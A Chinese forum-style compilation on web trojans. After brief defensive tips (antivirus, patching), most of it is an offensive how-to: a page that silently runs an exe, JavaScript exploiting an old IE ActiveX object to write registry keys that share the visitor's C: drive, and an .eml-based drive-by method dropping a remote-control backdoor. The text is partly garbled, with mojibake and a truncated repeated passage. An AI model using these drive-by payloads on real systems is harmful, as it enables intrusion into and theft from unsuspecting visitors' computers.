网页木马如何给网页上放木马?

怎样彻底解决网页木马的问题

不能彻底解决， 某些木马可以捆绑在已有WINDOWS签名的插件或者控件上面。

系统会自动安装的。

楼主主要看我总结的第一条。

防范如下： 1、不访问不良网站，（此类网站分为：网址非常长型，无规律型，数字字母混合型） 2、安装杀毒软件（个人推荐卡巴斯基7、CA，都免费） 3、养成良好的习惯，不要双击打开外来存储设备，（用右键点击之后选择打开） 4、下载的软件和电影之类的，运行前杀毒。

5、安装360修补漏洞。

6、新装电脑后请记下资源管理器里面的进程（主要是熟悉系统进程）

怎么做网页木马

1.它应该算是html带动同路径下的一个exe的文件的主页了，也就是当浏览器浏览这个页面的时候，一个exe的文件就在后台自动下载并执行了，可以做一个test.html的文件在桌面，内容如下： 再在桌面下随便找个exe的文件，名字一定要改为tset.exe，好了，这时候双击我们刚才生成的html文件，当看到“网页加载中，请稍后....”的时候，我们的那个同路径下的exe文件也被无条件执行了，这种页面的优点就是编译修改简单，但是！当你申请下了一个个人主页空间的时候，把这两个文件上传上去的时候，当你试图通过浏览器浏览你的杰作的时候，ie的安全警告跳了出来，我想没有几个人愿意乖乖的冒着风险去点“是”，好了，尽管这个网页木马在本地是多么的完美，但是放到了网上就通不过ie的安全策略了，这个小马失败了。

2.是通过ie自身的漏洞写入注册表，相信很多人经常在浏览一些主页的时候，注册表被改的乱七八糟、ie标题被改、首页被改、注册表编辑器被禁用等等，这些都是自动修改了你的注册表的网页的杰作，所以我门也可以做个页面让浏览者的硬盘完全共享，也是做个html的文件，内容如下： script language=javascript> document.write(""); function f(){ a1=document.applets[0]; a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Shl = a1.GetObject(); Shl.RegWrite ("HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\RWC$\Flags",402,"REG_DWORD"); Shl.RegWrite ("HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\RWC$\Type",0,"REG_DWORD" ); Shl.RegWrite ("HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\RWC$\Path","C:\"); } function init() { setTimeout("f()", 1000); } init(); 当对方的浏览过这个页面的时候，他的c:就被共享了，共享后的进入方法嘛..呵呵不用说了吧，但是他虽然被共巷了，但是你还不知道谁正在看你的这个页面，他的ip又是多少你都不知道，没有关系，有个很简单的方法，去163申请一个域名的转换，如： 连接目标地址里...褪枪蚕砹恿恕?/a> 这种网页木马的特点是比较安全，不宜被对方发现，但是使用麻烦需要牵扯到很多的东西。

3.也是现在最好用的一种了吧，个人认为。

它是将一个小巧的exe文件作成一个.eml的文件，再用ie的漏洞让一个html的页面执行这个.eml的文件，你的那个小巧的exe文件就被执行了，由于代码过长又因每个exe文件转换后的代码不同所以不可能一一写出，下面给出一个地址 实际上就是一个转...憧梢酝ü齮 x.x.x.x 3389来完全控制对方（这个5k的小后门是winshell5.0黑白网络有下，同时这个winshell5.0还有一个很出色的功能，就是能下载一个你事先设置好的指定路径下的一个文件，并执行他，我放置的是网络深偷，如果你的杀毒软件够厉害的话，神偷是可以被查出来的，这里只是实验，实际中可以指定很多查不到的小马，这里不阐述），有兴趣的朋友可以来试试。

这种网页木马的特点是，对方挨种率较高，除了制作麻烦一点外，没有什么缺点啦好了所有的漏洞都是建立在系统漏洞的前提下，多升级多打补丁没有坏处

如何给网页上放木马?

转载: 1.它应该算是html带动同路径下的一个exe的文件的主页了，也就是当浏览器浏览这个页面的时候，一个exe的文件就在后台自动下载并执行了，可以做一个test.html的文件在桌面，内容如下： 当对方的浏览过这个页面的时候，他的c:就被共享了，共享后的进入方法嘛..呵呵不用说了吧，但是他虽然被共巷了，但是你还不知道谁正在看你的这个页面，他的ip又是多少你都不知道，没有关系，有个很简单的方法，去163申请一个域名的转换，如： 连接目标地址里...褪枪蚕砹恿恕?/a> 这种网页木马的特点是比较安全，不宜被对